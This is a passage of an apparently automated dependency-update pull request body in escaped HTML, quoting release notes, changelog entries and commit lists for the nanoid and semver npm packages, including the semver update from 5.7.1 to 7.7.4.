\u003ccode\u003ecustomAlphabet\u003c/code\u003e size (by Enrico Scherlies).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.18\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.exports\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded files without \u003ccode\u003eprocess\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeeded up Nano ID 4 times (by Peter Boyer).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.types\u003c/code\u003e path.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003epackage.types\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved Node.js 15.0.0 with \u003ccode\u003erandomFillSync\u003c/code\u003e regression from \u003ccode\u003eengines.node\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/dafca319733b8b8b434acd11f5a4c59947ff678b\"\u003e\u003ccode\u003edafca31\u003c/code\u003e\u003c/a\u003e Release 3.1.20 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/a6f1f69363507e63d3ae99faaed727779b584e67\"\u003e\u003ccode\u003ea6f1f69\u003c/code\u003e\u003c/a\u003e Remove unnecessary comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/f85e1b0f587edda5bcd40da12f9c455d6eda7f96\"\u003e\u003ccode\u003ef85e1b0\u003c/code\u003e\u003c/a\u003e Release 3.1.19 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/46a116a98efd25b171885f0c8fc5d3d8abd1e2a6\"\u003e\u003ccode\u003e46a116a\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/dd4888e4aaaf1df5ec38c934fa1e609931cf464b\"\u003e\u003ccode\u003edd4888e\u003c/code\u003e\u003c/a\u003e Update size limit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/024e1122a035dac1ad2d68ec567fd023c6f63ae0\"\u003e\u003ccode\u003e024e112\u003c/code\u003e\u003c/a\u003e Fix custom random return condition (\u003ca href=\"https://redirect.github.com/ai/nanoid/issues/248\"\u003e#248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/838404e8481c3fe119b6fc0c87473a59a10518ab\"\u003e\u003ccode\u003e838404e\u003c/code\u003e\u003c/a\u003e Update dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/030bf5dc47759a6199619b332937ba3e7a91db03\"\u003e\u003ccode\u003e030bf5d\u003c/code\u003e\u003c/a\u003e Add Node.js 10 to CI\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/157808ddff14bdb7c081cdfb4ef9fe6ce31e9023\"\u003e\u003ccode\u003e157808d\u003c/code\u003e\u003c/a\u003e Update development configs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ai/nanoid/commit/2c512c3218919c0624e478f64a63c2111474cef6\"\u003e\u003ccode\u003e2c512c3\u003c/code\u003e\u003c/a\u003e Remove debug code\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ai/nanoid/compare/3.1.12...3.1.20\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `semver` from 5.7.1 to 7.7.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/npm/node-semver/releases\"\u003esemver's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.7.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.3...v7.7.4\"\u003e7.7.4\u003c/a\u003e (2026-01-16)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/a29faa5f3309a01c8e5aeb965fb5c02c4c4e80e2\"\u003e\u003ccode\u003ea29faa5\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/835\"\u003e#835\u003c/a\u003e cli: pass options to semver.valid() for loose version validation (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/835\"\u003e#835\u003c/a\u003e) (\u003ca href=\"https://github.com/mldangelo\"\u003e\u003ccode\u003e@​mldangelo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/1d28d5e82de16163daf721a7c76fff93e0d333ab\"\u003e\u003ccode\u003e1d28d5e\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/836\"\u003e#836\u003c/a\u003e fix typos and update -n CLI option documentation (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/836\"\u003e#836\u003c/a\u003e) (\u003ca href=\"https://github.com/mldangelo\"\u003e\u003ccode\u003e@​mldangelo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/120968b76760cb0db85a72bde2adedd0e9628793\"\u003e\u003ccode\u003e120968b\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/840\"\u003e#840\u003c/a\u003e \u003ccode\u003e@npmcli/template-oss@4.29.0\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/840\"\u003e#840\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/44d7130c60cedd3703048aa671bb1d659b79ab07\"\u003e\u003ccode\u003e44d7130\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/824\"\u003e#824\u003c/a\u003e bump \u003ccode\u003e@​npmcli/eslint-config\u003c/code\u003e from 5.1.0 to 6.0.0 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/824\"\u003e#824\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/70735767b68a1775eb67ac816b183b4a422101f4\"\u003e\u003ccode\u003e7073576\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/820\"\u003e#820\u003c/a\u003e reorder parameters in invalid-versions.js test (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/820\"\u003e#820\u003c/a\u003e) (\u003ca href=\"https://github.com/reggi\"\u003e\u003ccode\u003e@​reggi\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/5816d4cfd6d85169527a2bc22fbd5bf4c64f34e3\"\u003e\u003ccode\u003e5816d4c\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/829\"\u003e#829\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.28.0 to 4.28.1 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/829\"\u003e#829\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.7.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.2...v7.7.3\"\u003e7.7.3\u003c/a\u003e (2025-10-06)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/e37e0ca0b5fc910d2b1948d25dbc83cc3a0921ea\"\u003e\u003ccode\u003ee37e0ca\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/813\"\u003e#813\u003c/a\u003e faster paths for compare (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/813\"\u003e#813\u003c/a\u003e) (\u003ca href=\"https://github.com/H4ad\"\u003e\u003ccode\u003e@​H4ad\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/2471d7543e2e63d9d95358e2405e7e1cde926c36\"\u003e\u003ccode\u003e2471d75\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/811\"\u003e#811\u003c/a\u003e x-range build metadata support (i529015)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/8f05c87f56a4123259b8c6d9324f53eadb02e48f\"\u003e\u003ccode\u003e8f05c87\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/807\"\u003e#807\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.25.0 to 4.25.1 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/807\"\u003e#807\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/owlstronaut\"\u003e\u003ccode\u003e@​owlstronaut\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.7.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.1...v7.7.2\"\u003e7.7.2\u003c/a\u003e (2025-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/fcafb61ed566ff8ccf24818dd94b76738f037aa4\"\u003e\u003ccode\u003efcafb61\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/780\"\u003e#780\u003c/a\u003e add missing \u003ccode\u003e'use strict'\u003c/code\u003e directives (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/780\"\u003e#780\u003c/a\u003e) (\u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/c99f336fa3bdff465652f9041eab2127d2f52eb2\"\u003e\u003ccode\u003ec99f336\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/781\"\u003e#781\u003c/a\u003e prerelease identifier starting with digits (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/781\"\u003e#781\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/c760403b935d3ad35f83e9bbe5ebe1badef2fc71\"\u003e\u003ccode\u003ec760403\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/784\"\u003e#784\u003c/a\u003e template-oss-apply for workflow permissions (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/784\"\u003e#784\u003c/a\u003e) (\u003ca href=\"https://github.com/wraithgar\"\u003e\u003ccode\u003e@​wraithgar\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/2677f2a88334b0e728dbfe9ad9f5f57458437c87\"\u003e\u003ccode\u003e2677f2a\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/778\"\u003e#778\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.23.6 to 4.24.3 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/778\"\u003e#778\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.7.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.0...v7.7.1\"\u003e7.7.1\u003c/a\u003e (2025-02-03)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/af761c05bd53eef83b5e20f8b09360b0e70557dc\"\u003e\u003ccode\u003eaf761c0\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/764\"\u003e#764\u003c/a\u003e inc: fully capture prerelease identifier (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/764\"\u003e#764\u003c/a\u003e) (\u003ca href=\"https://github.com/wraithgar\"\u003e\u003ccode\u003e@​wraithgar\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.7.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.6.3...v7.7.0\"\u003e7.7.0\u003c/a\u003e (2025-01-29)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/0864b3ce7932667013e0c7c5ec764777d4682883\"\u003e\u003ccode\u003e0864b3c\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/753\"\u003e#753\u003c/a\u003e add \u0026quot;release\u0026quot; inc type (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/753\"\u003e#753\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/d588e3782864b1cab2fe9f2452b848e8c7f609d1\"\u003e\u003ccode\u003ed588e37\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/755\"\u003e#755\u003c/a\u003e diff: fix prerelease to stable version diff logic (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/755\"\u003e#755\u003c/a\u003e) (\u003ca href=\"https://github.com/eminberkayd\"\u003e\u003ccode\u003e@​eminberkayd\u003c/code\u003e\u003c/a\u003e, berkay.daglar)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/8a34bdecc783407f4e1a8a1ee1f67906b84a4b78\"\u003e\u003ccode\u003e8a34bde\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/754\"\u003e#754\u003c/a\u003e add identifier validation to \u003ccode\u003einc()\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/754\"\u003e#754\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/67e54785a0f871361230f84323cbb631b9b6d834\"\u003e\u003ccode\u003e67e5478\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/756\"\u003e#756\u003c/a\u003e readme: added missing period for consistency (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/756\"\u003e#756\u003c/a\u003e) (\u003ca href=\"https://github.com/shaymolcho\"\u003e\u003ccode\u003e@​shaymolcho\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/868d4bbe3d318c52544f38d5f9977a1103e924c2\"\u003e\u003ccode\u003e868d4bb\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/749\"\u003e#749\u003c/a\u003e clarify comment about obsolete prefixes (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/749\"\u003e#749\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/ljharb\"\u003e\u003ccode\u003e@​ljharb\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/145c554b8c7b7ecfcb451153ad18bdb2f24ad10d\"\u003e\u003ccode\u003e145c554\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/741\"\u003e#741\u003c/a\u003e bump \u003ccode\u003e@​npmcli/eslint-config\u003c/code\u003e from 4.0.5 to 5.0.0 (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/753e02b9d0cb3ac23e085dc33efcab3e08d61f2b\"\u003e\u003ccode\u003e753e02b\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/747\"\u003e#747\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.23.3 to 4.23.4 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/747\"\u003e#747\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/0b812d5fb5fbb208e89dc1250e2efafeaa549437\"\u003e\u003ccode\u003e0b812d5\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/744\"\u003e#744\u003c/a\u003e postinstall for dependabot template-oss PR (\u003ca href=\"https://github.com/hashtagchris\"\u003e\u003ccode\u003e@​hashtagchris\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/npm/node-semver/blob/main/CHANGELOG.md\"\u003esemver's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.3...v7.7.4\"\u003e7.7.4\u003c/a\u003e (2026-01-16)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/a29faa5f3309a01c8e5aeb965fb5c02c4c4e80e2\"\u003e\u003ccode\u003ea29faa5\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/835\"\u003e#835\u003c/a\u003e cli: pass options to semver.valid() for loose version validation (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/835\"\u003e#835\u003c/a\u003e) (\u003ca href=\"https://github.com/mldangelo\"\u003e\u003ccode\u003e@​mldangelo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/1d28d5e82de16163daf721a7c76fff93e0d333ab\"\u003e\u003ccode\u003e1d28d5e\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/836\"\u003e#836\u003c/a\u003e fix typos and update -n CLI option documentation (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/836\"\u003e#836\u003c/a\u003e) (\u003ca href=\"https://github.com/mldangelo\"\u003e\u003ccode\u003e@​mldangelo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/120968b76760cb0db85a72bde2adedd0e9628793\"\u003e\u003ccode\u003e120968b\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/840\"\u003e#840\u003c/a\u003e \u003ccode\u003e@npmcli/template-oss@4.29.0\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/840\"\u003e#840\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/44d7130c60cedd3703048aa671bb1d659b79ab07\"\u003e\u003ccode\u003e44d7130\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/824\"\u003e#824\u003c/a\u003e bump \u003ccode\u003e@​npmcli/eslint-config\u003c/code\u003e from 5.1.0 to 6.0.0 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/824\"\u003e#824\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/70735767b68a1775eb67ac816b183b4a422101f4\"\u003e\u003ccode\u003e7073576\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/820\"\u003e#820\u003c/a\u003e reorder parameters in invalid-versions.js test (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/820\"\u003e#820\u003c/a\u003e) (\u003ca href=\"https://github.com/reggi\"\u003e\u003ccode\u003e@​reggi\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/5816d4cfd6d85169527a2bc22fbd5bf4c64f34e3\"\u003e\u003ccode\u003e5816d4c\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/829\"\u003e#829\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.28.0 to 4.28.1 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/829\"\u003e#829\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/npm-cli-bot\"\u003e\u003ccode\u003e@​npm-cli-bot\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.2...v7.7.3\"\u003e7.7.3\u003c/a\u003e (2025-10-06)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/e37e0ca0b5fc910d2b1948d25dbc83cc3a0921ea\"\u003e\u003ccode\u003ee37e0ca\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/813\"\u003e#813\u003c/a\u003e faster paths for compare (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/813\"\u003e#813\u003c/a\u003e) (\u003ca href=\"https://github.com/H4ad\"\u003e\u003ccode\u003e@​H4ad\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/2471d7543e2e63d9d95358e2405e7e1cde926c36\"\u003e\u003ccode\u003e2471d75\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/811\"\u003e#811\u003c/a\u003e x-range build metadata support (i529015)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/8f05c87f56a4123259b8c6d9324f53eadb02e48f\"\u003e\u003ccode\u003e8f05c87\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/807\"\u003e#807\u003c/a\u003e bump \u003ccode\u003e@​npmcli/template-oss\u003c/code\u003e from 4.25.0 to 4.25.1 (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/807\"\u003e#807\u003c/a\u003e) (\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/owlstronaut\"\u003e\u003ccode\u003e@​owlstronaut\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/npm/node-semver/compare/v7.7.1...v7.7.2\"\u003e7.7.2\u003c/a\u003e (2025-05-12)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/fcafb61ed566ff8ccf24818dd94b76738f037aa4\"\u003e\u003ccode\u003efcafb61\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/780\"\u003e#780\u003c/a\u003e add missing \u003ccode\u003e'use strict'\u003c/code\u003e directives (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/780\"\u003e#780\u003c/a\u003e) (\u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/c99f336fa3bdff465652f9041eab2127d2f52eb2\"\u003e\u003ccode\u003ec99f336\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/781\"\u003e#781\u003c/a\u003e prerelease identifier starting with digits (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/781\"\u003e#781\u003c/a\u003e) (\u003ca href=\"https://github.com/mbtools\"\u003e\u003ccode\u003e@​mbtools\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChores\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/npm/node-semver/commit/c760403b935d3ad35f83e9bbe5ebe1badef2fc71\"\u003e\u003ccode\u003ec760403\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://redirect.github.com/npm/node-semver/pull/784\"\u003e#784\u003c/a\u003e template-oss-apply for workflow permissions (\u003ca href=\"https://redirect.github.com/npm/node-semver/issues/784\"\u003e#784\u003c/a\u003e) (\u003ca href=\"https://github.com/wraithgar\"\u003e\u003ccode\u003e@​wraithgar\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 